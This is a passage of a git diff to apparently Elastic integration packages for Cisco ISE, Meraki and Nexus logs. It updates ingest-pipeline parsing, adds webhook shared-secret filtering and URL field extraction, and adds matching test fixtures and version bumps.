+13,8 @@ processors: field: event.original tag: grok_time_details patterns: - - '^<%{NUMBER:log.syslog.priority:long}>%{SYSLOGTIMESTAMP:_tmp.timestamp} %{ISO8601_TIMEZONE:_tmp.timezone} %{DATA:host.hostname} %{DATA:cisco_ise.log.category.name} %{GREEDYDATA:_tmp.message}$' - - '^<%{NUMBER:log.syslog.priority:long}>%{SYSLOGTIMESTAMP:_tmp.timestamp} %{DATA:host.hostname} %{DATA:cisco_ise.log.category.name} %{GREEDYDATA:_tmp.message}$' + - '^(?:<%{NUMBER:log.syslog.priority:long}>)?%{SYSLOGTIMESTAMP:_tmp.timestamp} %{ISO8601_TIMEZONE:_tmp.timezone} %{DATA:host.hostname} %{DATA:cisco_ise.log.category.name} %{GREEDYDATA:_tmp.message}$' + - '^(?:<%{NUMBER:log.syslog.priority:long}>)?%{SYSLOGTIMESTAMP:_tmp.timestamp} %{DATA:host.hostname} %{DATA:cisco_ise.log.category.name} %{GREEDYDATA:_tmp.message}$' - '^%{DATA:cisco_ise.log.category.name} %{DATA:cisco_ise.log.message.id} %{NONNEGINT:cisco_ise.log.segment.total:long} %{NONNEGINT:cisco_ise.log.segment.number:long} %{GREEDYDATA:message}$' on_failure: - append: diff --git a/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/pipeline_administrative_and_operational_audit.yml b/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/pipeline_administrative_and_operational_audit.yml index f547aeeefbe..81f2c6feaa5 100644 --- a/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/pipeline_administrative_and_operational_audit.yml +++ b/packages/cisco_ise/data_stream/log/elasticsearch/ingest_pipeline/pipeline_administrative_and_operational_audit.yml @@ -175,7 +175,7 @@ processors: - append: field: event.category value: iam - if: ctx.cisco_ise?.log?.message?.code != null && ['51001','51002','51020','51021','52000','52001','52002','60077','60078','60461','61077','60077','58005','60094','60093','60134','60188','60116','60080','60115','60081'].contains(ctx.cisco_ise.log.message.code) + if: ctx.cisco_ise?.log?.message?.code != null && ['51001','51002','51020','51021','52000','52001','52002','60077','60078','60461','61077','58005','60094','60093','60134','60188','60116','60080','60115','60081'].contains(ctx.cisco_ise.log.message.code) ignore_failure: true - append: field: event.category @@ -235,7 +235,7 @@ processors: - append: field: event.type value: info - if: ctx.cisco_ise?.log?.message?.code != null && ['51001','51002','51020','51021','52000','52001','52002','60067','60070','60077','60078','60456','60461','61025','61026','61077','60077','58005','60094','60093','60134','60188','60116','60080','60115','60081'].contains(ctx.cisco_ise.log.message.code) + if: ctx.cisco_ise?.log?.message?.code != null && ['51001','51002','51020','51021','52000','52001','52002','60067','60070','60077','60078','60456','60461','61025','61026','61077','58005','60094','60093','60134','60188','60116','60080','60115','60081'].contains(ctx.cisco_ise.log.message.code) ignore_failure: true - append: field: event.type @@ -249,8 +249,8 @@ processors: def eventCategory = new ArrayList(); def eventType = new ArrayList(); def categoryReferenceTable = [ - ["messageCodeArray": ["51001","51002","51020","51021","52000","52001","52002","60077","60078","60461","61077","60077","58005","60094","60093","60134","60188","60116","60080","60115","60081"], "name": "iam"], - ["messageCodeArray": ["51001","51002","51020","51021","60077","60078","61077", "60077","60188","60116","60080","60115","60081"], "name": "authentication"], + ["messageCodeArray": ["51001","51002","51020","51021","52000","52001","52002","60077","60078","60461","61077","58005","60094","60093","60134","60188","60116","60080","60115","60081"], "name": "iam"], + ["messageCodeArray": ["51001","51002","51020","51021","60077","60078","61077","60188","60116","60080","60115","60081"], "name": "authentication"], ["messageCodeArray": ["61025","61026","60134"], "name": "network"], ["messageCodeArray": ["60067","60070","60456","58005"], "name": "process"], ["messageCodeArray": ["52000","52001","52002"], "name": "configuration"] @@ -263,7 +263,7 @@ processors: ["messageCodeArray": ["52002"], "name": "deletion"], ["messageCodeArray": ["61026"], "name": "end"], ["messageCodeArray": ["60116","60080","60115","60081"], "name": "user"], - ["messageCodeArray": ["51001","51002","51020","51021","52000","52001","52002","60067","60070","60077","60078","60456","60461","61025","61026","61077","60077","58005","60094","60093","60134","60188","60116","60080","60115","60081"], "name": "info"], + ["messageCodeArray": ["51001","51002","51020","51021","52000","52001","52002","60067","60070","60077","60078","60456","60461","61025","61026","61077","58005","60094","60093","60134","60188","60116","60080","60115","60081"], "name": "info"], ["messageCodeArray": ["60067","60456","61025"], "name": "start"] ]; diff --git a/packages/cisco_ise/manifest.yml b/packages/cisco_ise/manifest.yml index 7243aea3627..ec951dc4ecb 100644 --- a/packages/cisco_ise/manifest.yml +++ b/packages/cisco_ise/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: cisco_ise title: Cisco ISE -version: "1.21.3" +version: "1.22.1" description: Collect logs from Cisco ISE with Elastic Agent. type: integration categories: diff --git a/packages/cisco_meraki/_dev/deploy/docker/docker-compose.yml b/packages/cisco_meraki/_dev/deploy/docker/docker-compose.yml index 7714b740861..9886cc233b4 100644 --- a/packages/cisco_meraki/_dev/deploy/docker/docker-compose.yml +++ b/packages/cisco_meraki/_dev/deploy/docker/docker-compose.yml @@ -7,7 +7,6 @@ services: environment: - STREAM_PROTOCOL=webhook - STREAM_ADDR=http://elastic-agent:8686/meraki/events - - STREAM_WEBHOOK_HEADER=Authorization=abc123 command: log --start-signal=SIGHUP --delay=5s /sample_events/meraki-mx-ndjson.log meraki-webhook-https: image: docker.elastic.co/observability/stream:v0.6.2 @@ -16,7 +15,6 @@ services: environment: - STREAM_PROTOCOL=webhook - STREAM_ADDR=https://elastic-agent:8686/meraki/events - - STREAM_WEBHOOK_HEADER=Authorization=abc123 - STREAM_INSECURE=true command: log --start-signal=SIGHUP --delay=5s /sample_events/meraki-mx-ndjson.log cisco_meraki-log-logfile: diff --git a/packages/cisco_meraki/_dev/deploy/docker/sample_events/meraki-mx-ndjson.log b/packages/cisco_meraki/_dev/deploy/docker/sample_events/meraki-mx-ndjson.log index efed345fcab..42e9cbee130 100644 --- a/packages/cisco_meraki/_dev/deploy/docker/sample_events/meraki-mx-ndjson.log +++ b/packages/cisco_meraki/_dev/deploy/docker/sample_events/meraki-mx-ndjson.log @@ -1,2 +1,3 @@ -{ "version": "0.1", "sharedSecret": "secret", "sentAt": "2021-10-07T08:42:00.926325Z", "organizationId": "2930418", "organizationName": "My organization", "organizationUrl": "https://dashboard.meraki.com/o/VjjsAd/manage/organization/overview", "networkId": "N_24329156", "networkName": "Main Office", "networkUrl": "https://n1.meraki.com//n//manage/nodes/list", "networkTags": [], "deviceSerial": "Q234-ABCD-5678", "deviceMac": "00:11:22:33:44:55", "deviceName": "My appliance", "deviceUrl": "https://n1.meraki.com//n//manage/nodes/new_list/000000000000", "deviceTags": [ "tag1", "tag2" ], "deviceModel": "MX", "alertId": "0000000000000000", "alertType": "Cellular came up", "alertTypeId": "cellular_up", "alertLevel": "informational", "occurredAt": "2018-02-11T00:00:00.123450Z", "alertData": { "provider": "Purview Wireless", "model": "UML290VW", "local": "192.168.1.2", "remote": "1.2.3.5", "connection": "LTE" } } -{ "version": "0.1", "sharedSecret": "secret", "sentAt": "2021-10-07T08:42:00.927486Z", "organizationId": "2930418", "organizationName": "My organization", "organizationUrl": "https://dashboard.meraki.com/o/VjjsAd/manage/organization/overview", "networkId": "N_24329156", "networkName": "Main Office", "networkUrl": "https://n1.meraki.com//n//manage/nodes/list", "networkTags": [], "deviceSerial": "Q234-ABCD-5678", "deviceMac": "00:11:22:33:44:55", "deviceName": "", "deviceUrl": "https://n1.meraki.com//n//manage/nodes/new_list/000000000000", "deviceTags": [ "tag1", "tag2" ], "deviceModel": "", "alertId": "0000000000000000", "alertType": "Insight Alert", "alertTypeId": "mi_alert", "alertLevel": "warning", "occurredAt": "2018-02-11T00:00:00.123450Z", "alertData": {} } +{ "version": "0.1", "sharedSecret": "abc123", "sentAt": "2021-10-07T08:42:00.926325Z", "organizationId": "2930418", "organizationName": "My organization", "organizationUrl": "https://dashboard.meraki.com/o/VjjsAd/manage/organization/overview", "networkId": "N_24329156", "networkName": "Main Office", "networkUrl": "https://n1.meraki.com//n//manage/nodes/list", "networkTags": [], "deviceSerial": "Q234-ABCD-5678", "deviceMac": "00:11:22:33:44:55", "deviceName": "My appliance", "deviceUrl": "https://n1.meraki.com//n//manage/nodes/new_list/000000000000", "deviceTags": [ "tag1", "tag2" ], "deviceModel": "MX", "alertId": "0000000000000000", "alertType": "Cellular came up", "alertTypeId": "cellular_up", "alertLevel": "informational", "occurredAt": "2018-02-11T00:00:00.123450Z", "alertData": { "provider": "Purview Wireless", "model": "UML290VW", "local": "192.168.1.2", "remote": "1.2.3.5", "connection": "LTE" } } +{ "version": "0.1", "sharedSecret": "abc123", "sentAt": "2021-10-07T08:42:00.927486Z", "organizationId": "2930418", "organizationName": "My organization", "organizationUrl": "https://dashboard.meraki.com/o/VjjsAd/manage/organization/overview", "networkId": "N_24329156", "networkName": "Main Office", "networkUrl": "https://n1.meraki.com//n//manage/nodes/list", "networkTags": [], "deviceSerial": "Q234-ABCD-5678", "deviceMac": "00:11:22:33:44:55", "deviceName": "", "deviceUrl": "https://n1.meraki.com//n//manage/nodes/new_list/000000000000", "deviceTags": [ "tag1", "tag2" ], "deviceModel": "", "alertId": "0000000000000000", "alertType": "Insight Alert", "alertTypeId": "mi_alert", "alertLevel": "warning", "occurredAt": "2018-02-11T00:00:00.123450Z", "alertData": {} } +{ "version": "0.1", "sharedSecret": "wrongsecret", "sentAt": "2021-10-09T08:42:00.926325Z", "organizationId": "2930418", "organizationName": "My organization", "organizationUrl": "https://dashboard.meraki.com/o/VjjsAd/manage/organization/overview", "networkId": "N_24329156", "networkName": "Main Office", "networkUrl": "https://n1.meraki.com//n//manage/nodes/list", "networkTags": [], "deviceSerial": "Q234-ABCD-5678", "deviceMac": "00:11:22:33:44:55", "deviceName": "My appliance", "deviceUrl": "https://n1.meraki.com//n//manage/nodes/new_list/000000000000", "deviceTags": [ "tag1", "tag2" ], "deviceModel": "MX", "alertId": "0000000000000000", "alertType": "Cellular came up", "alertTypeId": "cellular_up", "alertLevel": "informational", "occurredAt": "2018-02-11T00:00:00.123450Z", "alertData": { "provider": "Purview Wireless", "model": "UML290VW", "local": "192.168.1.2", "remote": "1.2.3.5", "connection": "LTE" } } diff --git a/packages/cisco_meraki/changelog.yml b/packages/cisco_meraki/changelog.yml index 49b4dfd4aef..1d4bbd4c310 100644 --- a/packages/cisco_meraki/changelog.yml +++ b/packages/cisco_meraki/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.21.2" + changes: + - description: Fix webhook shared secret configuration and behavior. + type: bugfix + link: https://github.com/elastic/integrations/pull/9415 +- version: "1.21.1" + changes: + - description: Fix url processing. + type: bugfix + link: https://github.com/elastic/integrations/pull/9310 +- version: "1.21.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.20.3" changes: - description: Changed owners diff --git a/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-common-config.yml b/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..1397ab41fa1 --- /dev/null +++ b/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + _conf: + secret: secret diff --git a/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json b/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json index 9c0907b47e0..e02ee2d7160 100644 --- a/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json +++ b/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json @@ -100,6 +100,43 @@ "ifUp": "1" } } + }, + { + "json": { + "version": "0.1", + "sharedSecret": "wrong_secret", + "sentAt": "2021-10-07T08:42:00.937240Z", + "organizationId": "2930418", + "organizationName": "My organization", + "organizationUrl": "https://dashboard.meraki.com/o/VjjsAd/manage/organization/overview", + "networkId": "N_24329156", + "networkName": "Main Office", + "networkUrl": "https://n1.meraki.com//n//manage/nodes/list", + "networkTags": [], + "deviceSerial": "Q234-ABCD-5678", + "deviceMac": "00:11:22:33:44:55", + "deviceName": "My switch", + "deviceUrl": "https://n1.meraki.com//n//manage/nodes/new_list/000000000000", + "deviceTags": [ + "tag1", + "tag2" + ], + "deviceModel": "MS", + "alertId": "0000000000000000", + "alertType": "Failover event detected", + "alertTypeId": "vrrp", + "alertLevel": "critical", + "occurredAt": "2018-02-11T00:00:00.123450Z", + "alertData": { + "oldIfUp": "0", + "oldMode": "detect", + "oldPrio": "75", + "electorState": "master", + "mode": "detect", + "prio": "75", + "ifUp": "1" + } + } } ] } \ No newline at end of file diff --git a/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json-expected.json b/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json-expected.json index 39bf59e6c34..fac58ef26fb 100644 --- a/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json-expected.json +++ b/packages/cisco_meraki/data_stream/events/_dev/test/pipeline/test-mx-events.json-expected.json @@ -169,6 +169,7 @@ "id": "2930418", "name": "My organization" } - } + }, + null ] } \ No newline at end of file diff --git a/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-http-config.yml b/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-http-config.yml index 8d1477c15e5..78f38d6c822 100644 --- a/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-http-config.yml +++ b/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-http-config.yml @@ -9,3 +9,5 @@ data_stream: url: /meraki/events secret_value: abc123 preserve_original_event: true +assert: + hit_count: 2 diff --git a/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-https-config.yml b/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-https-config.yml index 1bec59a6396..062f0400af8 100644 --- a/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-https-config.yml +++ b/packages/cisco_meraki/data_stream/events/_dev/test/system/test-meraki-https-config.yml @@ -60,3 +60,5 @@ data_stream: Iqi7is4z2mP8pbcIIlmloogE -----END PRIVATE KEY----- verification_mode: none +assert: + hit_count: 2 \ No newline at end of file diff --git a/packages/cisco_meraki/data_stream/events/agent/stream/http_endpoint.yml.hbs b/packages/cisco_meraki/data_stream/events/agent/stream/http_endpoint.yml.hbs index 1203728f145..e0d65604e3e 100644 --- a/packages/cisco_meraki/data_stream/events/agent/stream/http_endpoint.yml.hbs +++ b/packages/cisco_meraki/data_stream/events/agent/stream/http_endpoint.yml.hbs @@ -13,8 +13,10 @@ url: {{url}} {{/if}} {{#if secret_value}} -secret.header: Authorization -secret.value: "{{secret_value}}" +fields_under_root: true +fields: + _conf: + secret: "{{secret_value}}" {{/if}} {{#if ssl}} diff --git a/packages/cisco_meraki/data_stream/events/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_meraki/data_stream/events/elasticsearch/ingest_pipeline/default.yml index 9dcc7e2fc32..79bf9a4ce3b 100644 --- a/packages/cisco_meraki/data_stream/events/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_meraki/data_stream/events/elasticsearch/ingest_pipeline/default.yml @@ -1,6 +1,8 @@ --- description: Pipeline for processing Cisco Meraki events processors: +- drop: + if: ctx.json?.sharedSecret != null && ctx.json.sharedSecret != '' && ctx._conf?.secret != ctx.json.sharedSecret - set: field: ecs.version value: '8.11.0' @@ -15,7 +17,7 @@ processors: - append: field: observer.mac value: '{{{_tmp.observer.mac}}}' - if: ctx?._tmp?.observer?.mac != null + if: ctx._tmp?.observer?.mac != null - set: field: observer.name copy_from: json.deviceName @@ -267,10 +269,11 @@ processors: - cisco_meraki.event.alertType - cisco_meraki.event.alertLevel - _tmp + - _conf ignore_missing: true - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" ignore_failure: true ignore_missing: true - script: diff --git a/packages/cisco_meraki/data_stream/events/manifest.yml b/packages/cisco_meraki/data_stream/events/manifest.yml index 6a15a465045..9d1aea4f7c3 100644 --- a/packages/cisco_meraki/data_stream/events/manifest.yml +++ b/packages/cisco_meraki/data_stream/events/manifest.yml @@ -31,11 +31,12 @@ streams: show_user: false default: /meraki/events - name: secret_value - type: text - description: Authorization token + type: password + description: Shared secret used for selecting events that can be ingested. multi: false required: false show_user: true + secret: true - name: ssl type: yaml title: TLS diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log index 56be8864bea..a62fadbd6eb 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log +++ b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log @@ -1,3 +1,4 @@ <134>1 1647479503.348215340 MX84 urls src=10.0.1.29:60336 dst=89.160.20.156:80 mac=78:7B:8A:CC:05:18 request: UNKNOWN https://bitbucket.org/... <134>1 1647479503.676404537 MX84 urls src=10.0.0.234:56424 dst=89.160.20.112:443 mac=64:1C:AE:68:2A:01 request: GET https://lh3.googleusercontent.com/p/AFVnnY=w2048-h1024 <134>1 1647479503.676404537 MX84 urls src=10.0.0.234:56424 dst=89.160.20.112:443 mac=64:1C:AE:68:2A:01 agent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0' request: GET https://lh3.googleusercontent.com/p/AFVnnY=w2048-h1024 +<134>1 1709836794.196198735 BOS_WAP2_Service urls src=10.0.1.29:60336 dst=89.160.20.112:443 mac=64:1C:AE:68:2A:01 agent='Microsoft NCSI' request: GET http://www.msftconnecttest.com/connecttest.txt diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log-expected.json b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log-expected.json index 4172aac2ad2..0805b8cc605 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log-expected.json +++ b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-urls.log-expected.json @@ -63,7 +63,12 @@ "preserve_original_event" ], "url": { - "original": "https://bitbucket.org/..." + "domain": "bitbucket.org", + "original": "https://bitbucket.org/...", + "path": "/...", + "registered_domain": "bitbucket.org", + "scheme": "https", + "top_level_domain": "org" } }, { @@ -129,7 +134,13 @@ "preserve_original_event" ], "url": { - "original": "https://lh3.googleusercontent.com/p/AFVnnY=w2048-h1024" + "domain": "lh3.googleusercontent.com", + "original": "https://lh3.googleusercontent.com/p/AFVnnY=w2048-h1024", + "path": "/p/AFVnnY=w2048-h1024", + "registered_domain": "googleusercontent.com", + "scheme": "https", + "subdomain": "lh3", + "top_level_domain": "com" } }, { @@ -195,7 +206,13 @@ "preserve_original_event" ], "url": { - "original": "https://lh3.googleusercontent.com/p/AFVnnY=w2048-h1024" + "domain": "lh3.googleusercontent.com", + "original": "https://lh3.googleusercontent.com/p/AFVnnY=w2048-h1024", + "path": "/p/AFVnnY=w2048-h1024", + "registered_domain": "googleusercontent.com", + "scheme": "https", + "subdomain": "lh3", + "top_level_domain": "com" }, "user_agent": { "device": { @@ -210,6 +227,86 @@ }, "version": "108.0." } + }, + { + "@timestamp": "2024-03-07T18:39:54.196Z", + "cisco_meraki": { + "event_subtype": "http_access", + "event_type": "urls", + "urls": { + "mac": "64-1C-AE-68-2A-01" + } + }, + "destination": { + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.112", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "http-access", + "category": [ + "network", + "web" + ], + "original": "<134>1 1709836794.196198735 BOS_WAP2_Service urls src=10.0.1.29:60336 dst=89.160.20.112:443 mac=64:1C:AE:68:2A:01 agent='Microsoft NCSI' request: GET http://www.msftconnecttest.com/connecttest.txt", + "type": [ + "info", + "access" + ] + }, + "http": { + "request": { + "method": "GET" + } + }, + "observer": { + "hostname": "BOS_WAP2_Service" + }, + "source": { + "ip": "10.0.1.29", + "port": 60336 + }, + "tags": [ + "forwarded", + "preserve_original_event" + ], + "url": { + "domain": "www.msftconnecttest.com", + "extension": "txt", + "original": "http://www.msftconnecttest.com/connecttest.txt", + "path": "/connecttest.txt", + "registered_domain": "msftconnecttest.com", + "scheme": "http", + "subdomain": "www", + "top_level_domain": "com" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "'Microsoft NCSI'" + } } ] } \ No newline at end of file diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/cisco_meraki/data_stream/log/_dev/test/system/test-logfile-config.yml index 075ff2cfb2c..0d8dcb81f8c 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/system/test-logfile-config.yml +++ b/packages/cisco_meraki/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -5,3 +5,5 @@ data_stream: paths: - "{{SERVICE_LOGS_DIR}}/cisco-meraki*.log" preserve_original_event: true +assert: + hit_count: 204 diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/cisco_meraki/data_stream/log/_dev/test/system/test-tcp-config.yml index 1a0939ace90..f85ea451cf6 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/system/test-tcp-config.yml +++ b/packages/cisco_meraki/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -6,3 +6,5 @@ data_stream: listen_address: 0.0.0.0 listen_port: 8685 preserve_original_event: true +assert: + hit_count: 204 diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/cisco_meraki/data_stream/log/_dev/test/system/test-udp-config.yml index 5699b412d51..e7918a6aa12 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/system/test-udp-config.yml +++ b/packages/cisco_meraki/data_stream/log/_dev/test/system/test-udp-config.yml @@ -6,3 +6,8 @@ data_stream: listen_address: 0.0.0.0 listen_port: 8685 preserve_original_event: true +# Do not assert hit count for this input. Locally, the constraint is +# satisfied, but on CI, apparently the UDP input drops too many (>0) +# messages. +# assert: +# hit_count: 204 \ No newline at end of file diff --git a/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/urls.yml b/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/urls.yml index 6238d122ade..f284cc5a6bd 100644 --- a/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/urls.yml +++ b/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/urls.yml @@ -73,6 +73,15 @@ processors: - user_agent: field: user_agent.original ignore_missing: true +# url processing +- uri_parts: + field: url.original + target_field: url + if: ctx.url?.original != null && ctx.url.original != "" +- registered_domain: + field: url.domain + target_field: url + ignore_missing: true on_failure: - set: field: event.kind diff --git a/packages/cisco_meraki/data_stream/log/fields/ecs.yml b/packages/cisco_meraki/data_stream/log/fields/ecs.yml index 37c048e439f..c44c63e7226 100644 --- a/packages/cisco_meraki/data_stream/log/fields/ecs.yml +++ b/packages/cisco_meraki/data_stream/log/fields/ecs.yml @@ -236,6 +236,8 @@ name: url.registered_domain - external: ecs name: url.scheme +- external: ecs + name: url.subdomain - external: ecs name: url.top_level_domain - external: ecs diff --git a/packages/cisco_meraki/docs/README.md b/packages/cisco_meraki/docs/README.md index 9c1fc2c54fd..3cf417cf830 100644 --- a/packages/cisco_meraki/docs/README.md +++ b/packages/cisco_meraki/docs/README.md @@ -274,6 +274,7 @@ The `cisco_meraki.log` dataset provides events from the configured syslog server | url.query | The query field describes the query string of the request, such as "q=elasticsearch". The `?` is excluded from the query string. If a URL contains no `?`, there is no query field. If there is a `?` but no query, the query field exists with an empty string. The `exists` query can be used to differentiate between the two cases. | keyword | | url.registered_domain | The highest registered url domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword | | url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword | +| url.subdomain | The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. | keyword | | url.top_level_domain | The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". | keyword | | user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword | | user.full_name | User's full name, if available. | keyword | diff --git a/packages/cisco_meraki/manifest.yml b/packages/cisco_meraki/manifest.yml index e65192ce8af..fb4e45580f2 100644 --- a/packages/cisco_meraki/manifest.yml +++ b/packages/cisco_meraki/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cisco_meraki title: Cisco Meraki -version: "1.20.3" +version: "1.21.2" description: Collect logs from Cisco Meraki with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - security conditions: kibana: - version: ^7.17.0 || ^8.0.0 + version: ^8.12.0 screenshots: - src: /img/cisco-meraki-dashboard-1.png title: Cisco Meraki Dashboard diff --git a/packages/cisco_nexus/changelog.yml b/packages/cisco_nexus/changelog.yml index e8028e729ed..66c32546e57 100644 --- a/packages/cisco_nexus/changelog.yml +++ b/packages/cisco_nexus/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9570 +- version: "1.1.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/pipeline_extract_message.yml b/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/pipeline_extract_message.yml index 2d8a3fed2fb..fad1fb71c56 100644 --- a/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/pipeline_extract_message.yml +++ b/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/pipeline_extract_message.yml @@ -5,13 +5,13 @@ processors: field: message if: "['IF_DOWN_ADMIN_DOWN','IF_ADMIN_UP','SPEED','IF_DUPLEX','IF_RX_FLOW_CONTROL','IF_TX_FLOW_CONTROL','IF_UP','IF_XCVR_WARNING'].contains(ctx.event?.code.toUpperCase())" patterns: - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name} is up in mode %{DATA:cisco_nexus.log.interface.mode}$' - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name} is %{GREEDYDATA}$' - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational speed changed to %{DATA:cisco_nexus.log.operational.speed}$' - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational duplex mode changed to %{DATA:cisco_nexus.log.operational.duplex_mode}$' - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational Receive Flow Control state changed to %{DATA:cisco_nexus.log.operational.receive_flow_control_state}$' - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational Transmit Flow Control state changed to %{DATA:cisco_nexus.log.operational.transmit_flow_control_state}$' - - '^(?:%{GREEDYDATA}%{SPACE}?(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, %{GREEDYDATA}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name} is up in mode %{DATA:cisco_nexus.log.interface.mode}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name} is %{GREEDYDATA}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational speed changed to %{DATA:cisco_nexus.log.operational.speed}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational duplex mode changed to %{DATA:cisco_nexus.log.operational.duplex_mode}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational Receive Flow Control state changed to %{DATA:cisco_nexus.log.operational.receive_flow_control_state}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, operational Transmit Flow Control state changed to %{DATA:cisco_nexus.log.operational.transmit_flow_control_state}$' + - '^(?:%{GREEDYDATA}%{SPACE}(?i)interface)%{SPACE}%{DATA:cisco_nexus.log.interface.name}, %{GREEDYDATA}$' ignore_failure: true - grok: description: Extract 